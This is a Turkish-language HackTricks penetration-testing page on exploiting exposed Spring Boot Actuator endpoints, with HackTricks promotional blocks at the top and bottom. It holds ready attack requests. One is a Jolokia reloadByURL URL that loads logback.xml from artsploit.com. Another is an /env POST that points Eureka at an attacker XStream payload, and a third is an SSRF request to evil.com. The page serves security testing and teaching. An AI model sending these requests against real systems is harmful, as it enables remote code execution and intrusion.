hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

88 lines
5.6 KiB
Markdown
Raw Normal View History

2022-10-10 09:20:50 +00:00
# Spring Actuators
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları:
2023-12-31 01:24:39 +00:00
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönderin.
2022-04-28 16:01:33 +00:00
</details>
## **Spring Auth Atlatma**
2023-03-02 18:08:43 +00:00
<figure><img src="../../.gitbook/assets/image (924).png" alt=""><figcaption></figcaption></figure>
2023-03-02 18:08:43 +00:00
2024-02-10 18:14:16 +00:00
**Kaynak** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
2020-10-15 10:27:50 +00:00
## Spring Boot Actuators'ü Sömürme
2020-10-15 10:27:50 +00:00
**Orijinal yazıyı kontrol edin** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
2023-03-02 18:08:43 +00:00
2024-02-10 18:14:16 +00:00
### **Ana Noktalar:**
2020-10-15 10:27:50 +00:00
* Spring Boot Actuators, `/health`, `/trace`, `/beans`, `/env` gibi uç noktaları kaydeder. Sürümler 1'den 1.4'e kadar, bu uç noktalara kimlik doğrulama olmadan erişilebilir. Sürüm 1.5'ten itibaren yalnızca `/health` ve `/info` varsayılan olarak hassas olmayan uç noktalardır, ancak geliştiriciler genellikle bu güvenliği devre dışı bırakırlar.
* Belirli Actuator uç noktaları hassas verileri açığa çıkarabilir veya zararlı eylemlere izin verebilir:
* `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart` ve `/heapdump`.
* Spring Boot 1.x'te aktüatörler kök URL altında kaydedilirken, 2.x'te `/actuator/` temel yolun altında kaydedilir.
2020-10-15 10:27:50 +00:00
2024-02-10 18:14:16 +00:00
### **Sömürü Teknikleri:**
2020-10-15 10:27:50 +00:00
1. **'/jolokia' Üzerinden Uzaktan Kod Yürütme**:
* `/jolokia` aktüatör uç noktası, HTTP erişimine izin veren MBeans'e erişim sağlayan Jolokia Kütüphanesini açığa çıkarır.
* `reloadByURL` eylemi, dış URL'den günlüğü yeniden yüklemeyi sağlar ve bu da oluşturulmuş XML yapılandırmaları aracılığıyla kör XXE veya Uzaktan Kod Yürütme'ye yol açabilir.
* Örnek saldırı URL'si: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **'/env' Üzerinden Yapılandırma Değişikliği**:
* Spring Cloud Kütüphaneleri varsa, `/env` uç noktası çevresel özelliklerin değiştirilmesine izin verir.
* Özellikler, Eureka servisURL'deki XStream deserializasyon açığı gibi zafiyetleri sömürmek için manipüle edilebilir.
* Örnek saldırı POST isteği:
2020-10-15 10:27:50 +00:00
2024-02-10 18:14:16 +00:00
```
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
2020-10-15 10:27:50 +00:00
2024-02-10 18:14:16 +00:00
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **Diğer Faydalı Ayarlar**:
* `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url` ve `spring.datasource.tomcat.max-active` gibi özellikler, SQL enjeksiyonu veya veritabanı bağlantı dizelerini değiştirmek gibi çeşitli saldırılar için manipüle edilebilir.
2020-10-15 10:27:50 +00:00
2024-02-10 18:14:16 +00:00
### **Ek Bilgi:**
2020-10-15 10:27:50 +00:00
* Varsayılan aktüatörlerin kapsamlı bir listesi [burada](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt) bulunabilir.
* Spring Boot 2.x'te `/env` uç noktası özellik değişikliği için JSON formatını kullanır, ancak genel kavram aynı kalır.
2020-10-15 10:27:50 +00:00
2024-02-10 18:14:16 +00:00
### **İlgili Konular:**
2020-10-15 10:27:50 +00:00
1. **Env + H2 Uzaktan Kod Yürütme**:
* `/env` uç noktası ve H2 veritabanının kombinasyonunu sömürme detayları [burada](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) bulunabilir.
2. **Yanlış Yol Adı Yorumlamasıyla Spring Boot Üzerinde SSRF**:
* Spring çerçevesinin HTTP yol adlarında matris parametreleri (`;`) işleme şekli, Sunucu Tarafı İstek Sahtekarlığı (SSRF) için sömürülebilir.
* Örnek saldırı isteği:
2020-10-15 10:27:50 +00:00
2024-02-10 18:14:16 +00:00
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları:
2023-12-31 01:24:39 +00:00
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönderin.
2022-04-28 16:01:33 +00:00
</details>